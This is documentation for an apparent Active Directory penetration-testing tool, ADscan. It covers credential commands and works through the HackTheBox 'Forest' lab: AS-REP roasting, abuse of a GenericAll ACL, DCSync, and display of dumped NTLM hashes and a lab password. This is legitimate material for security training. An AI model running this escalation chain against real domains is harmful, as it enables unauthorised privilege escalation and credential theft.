🔐 Credential Management
Manage and utilize discovered Active Directory credentials
ADscan automatically discovers and stores credentials during enumeration and exploitation. Use these commands to view and work with discovered credentials.
Commands
creds show
Display all discovered credentials in the current workspace.
Syntax:
creds showExample (Forest workspace):
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds show ╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Credentials for domain htb.local │
│ ╭──────────────────────┬──────────────┬──────────────────────────────────┬────────────────────────────┬────────────────────────────╮ │
│ │ User │ Domain │ Credential │ Source │ Notes │ │
│ ├──────────────────────┼──────────────┼──────────────────────────────────┼────────────────────────────┼────────────────────────────┤ │
│ │ Administrator │ htb.local │ 32693b11e6aa90eb43d32c72a07ceea6 │ DCSync │ Domain Admin │ │
│ │ krbtgt │ htb.local │ 819af826bb148e603acb0f33d17632f8 │ DCSync │ KRBTGT account │ │
│ │ $331000-VK4ADACQNUCA │ htb.local │ 31d6cfe0d16ae931b73c59d7e0c089c0 │ DCSync │ Disabled computer account │ │
│ │ sebastien │ htb.local │ Ob********bi │ DCSync / Password cracking │ Masked cleartext password │ │
│ │ lucinda │ htb.local │ Th***************0l │ DCSync / Password cracking │ Masked cleartext password │ │
│ │ svc-alfresco │ htb.local │ s3***ce │ AS-REP Roasting │ Masked cleartext password │ │
│ │ andy │ htb.local │ 29dfccaf39618ff101de5165b19d524b │ DCSync │ User NTLM hash │ │
│ │ mark │ htb.local │ 9e63ebcb217bf3c6b27056fdcb6150f7 │ DCSync │ User NTLM hash │ │
│ │ santi │ htb.local │ pl*******hb │ DCSync / Password cracking │ Masked cleartext password │ │
│ ╰──────────────────────┴──────────────┴──────────────────────────────────┴────────────────────────────┴────────────────────────────╯ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯What it shows:
- All discovered usernames
- Associated domains
- Cleartext passwords (when cracked)
- NTLM hashes
- Source of credential discovery (AS-REP roasting, Kerberoasting, DCSync, etc.)
creds select
Select a specific credential to use for further enumeration and exploitation.
Syntax:
creds select <domain>Parameters:
domain: The domain name of the credentials to select
Example (Forest workspace):
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds select htb.local ? Select credential for domain htb.local:
1) svc-alfresco@s3***ce (AS-REP Roasting)
2) Administrator@32693b11e6aa90eb43d32c72a07ceea6 (DCSync)
3) sebastien@Ob********bi (DCSync / cracked)
4) lucinda@Th***************0l (DCSync / cracked)
5) santi@pl*******hb (DCSync / cracked)
Select an option (1-5): 2
✓ Selected credential: [email protected]
ℹ Subsequent authenticated enumeration will use this account.What it does: When you select credentials, ADscan will:
- Show available credentials for the specified domain
- Allow you to choose which credential to use
- Enumerate privileges and access for the selected user:
- Accessible SMB shares
- ACL permissions
- Group memberships
- Special privileges
- Attack steps and paths (BloodHound-backed where available)
Use cases:
- Switch between different compromised accounts
- Test access levels of different users
- Enumerate lateral movement opportunities
- Identify privilege escalation paths
creds save
Add a credential manually to continue an existing campaign.
Syntax:
creds save <domain> <username> <password_or_hash> [host] [service]Alias also supported:
creds add <domain> <username> <password_or_hash> [host] [service]Important workflow rule:
- Initialize the domain first with
start_auth. - Use
creds saveafterwards to add extra credentials you found outside ADscan.
If the domain is not initialized in the current workspace, ADscan will block the save and guide you to run start_auth first.
Examples:
# 1) Initialize domain context first
start_auth
# 2) Later, add an additional domain credential
creds save htb.local svc-backup 'Winter2026!'
# 3) Optional local credential (host + service)
creds save htb.local administrator 'P@ssw0rd!' dc01.htb.local smbOwned users and attack paths
In ADscan, “owned users” are users with a verified credential stored in the workspace. Once you have owned users, you can search for escalation chains from those entry points:
attack_paths <domain> owned
attack_steps <domain>This is especially useful after password spraying, roasting, or any technique that adds new valid credentials. See Attack Paths & Steps for the full workflow.
System Command
system
Execute shell commands in the environment where ADscan is running.
Syntax:
system <command>Parameters:
command: Any shell command to execute locally
Examples:
# Check local user
(ADscan:workspace) > system whoami
kali
# View network interfaces
(ADscan:workspace) > system ip addr show
# Check VPN connection
(ADscan:workspace) > system ping -c 1 10.10.10.161Important Notes:
- By default, ADscan runs inside Docker, so
systemexecutes inside the ADscan container (with host networking) systemdoes NOT execute commands on the target domain- Useful for checking local system state, files, and network connectivity
- All standard Linux/bash commands are available
Docker Mode Note
If you need to run commands on the host (for example docker ps), use a separate terminal on the host OS.
Common Use Cases:
# Verify VPN connectivity
system ping <target_ip>
# Check available disk space
system df -h
# Check network routes
system ip route
# Verify tool installations
system which hashcatTo inspect workspace files on the host, use a separate terminal:
ls -la ~/.adscan/workspaces/
cp ~/.adscan/workspaces/<workspace>/report.json /tmp/Credential Storage
Credentials are automatically saved as part of the workspace state:
~/.adscan/workspaces/<workspace>/
├── variables.json # Structured state: domains, credentials, services, config
└── report.json # JSON report of discovered issues and attack pathsSecurity:
variables.jsoncontains discovered credentials (including cleartext passwords and hashes)- Files should have restrictive permissions (600)
- Cleartext passwords are only stored when explicitly cracked
Credential Sources
ADscan discovers credentials through various techniques:
| Technique | Description | Output |
|---|---|---|
| AS-REP Roasting | Pre-authentication disabled accounts | Password (cracked hash) |
| Kerberoasting | Service accounts with SPNs | Password (cracked TGS) |
| DCSync | Domain replication rights | NTLM hashes (all users) |
| SAM Dump | Local account database | NTLM hashes (local users) |
| LSA Secrets | LSA cached credentials | Passwords or hashes |
| DPAPI | Data Protection API credentials | Passwords (decrypted) |
Workflow Example
Complete credential management workflow (Forest example):
You can run start_auth in guided mode and enter the target details when prompted:
- Domain:
htb.local - DC IP:
10.129.2.124 - Username:
svc-alfresco - Password:
s3rvice
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > start_authIf you prefer to skip the guided prompts, you can also run:
(ADscan:workspace) > start_auth htb.local 10.129.2.124 svc-alfresco s3rvice [+] Credentials validated successfully for [email protected]
ℹ Enumerating domain privileges and ACLs for user svc-alfresco
⚠ There is an ACE with GenericAll on 'Exchange Windows Permissions'
Do you want to exploit the GenericAll/GenericWrite privilege on Exchange Windows Permissions? [y/n] (y): y
ℹ Executing AddSelf attack
✓ User svc-alfresco successfully added to group Exchange Windows Permissions
ℹ Adding DCSync permissions to user svc-alfresco on the domain domain
✓ GenericAll added successfully
ℹ Performing DCSync for user Administrator
✓ Found credential: htb.local/Administrator with hash 32693b11e6aa90eb43d32c72a07ceea6 (ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds show [...same output as above 'Discovered Credentials (Forest)' example...] (ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds select htb.local ? Select credential for domain htb.local:
1) svc-alfresco@s3***ce (AS-REP Roasting)
2) Administrator@32693b11e6aa90eb43d32c72a07ceea6 (DCSync)
3) sebastien@Ob********bi
4) lucinda@Th***************0l
5) santi@pl*******hb
Select an option (1-5): 2
✓ Selected credential: [email protected]
ℹ Subsequent authenticated enumeration will use this account.# On the host (separate terminal)
ls ~/.adscan/workspaces/htb_forest/Best Practices
Credential Rotation
When you discover new credentials:
- Use
creds showto view all accounts - Test each credential with
creds select - Document which accounts have which access
- Prioritize high-privilege accounts for further exploitation
Secure Storage
- Never share variables.json publicly
- Encrypt workspace backups before transferring
- Delete old workspaces after engagement completion
- Use
clear_allto wipe workspace data when done
Sensitive Data Protection
The variables.json file contains cleartext passwords and NTLM hashes. Always protect this file with restrictive permissions (600), encrypt backups before transfer, and securely delete workspace data after engagement completion using clear_all.
Credential Testing
# Select different credentials to test access
creds select corp.local # Test user1
creds select corp.local # Test user2
# Compare access levels between accounts
# Identify which accounts have DA/EA privilegesRelated Commands
- Scanning Commands - Discover credentials through scanning
- Workspace Management - Manage workspace data
Next Steps
After discovering credentials:
- Use
creds showto view all credentials - Select high-value credentials with
creds select - Enumerate privileges and accessible resources
- Follow BloodHound attack paths to escalate privileges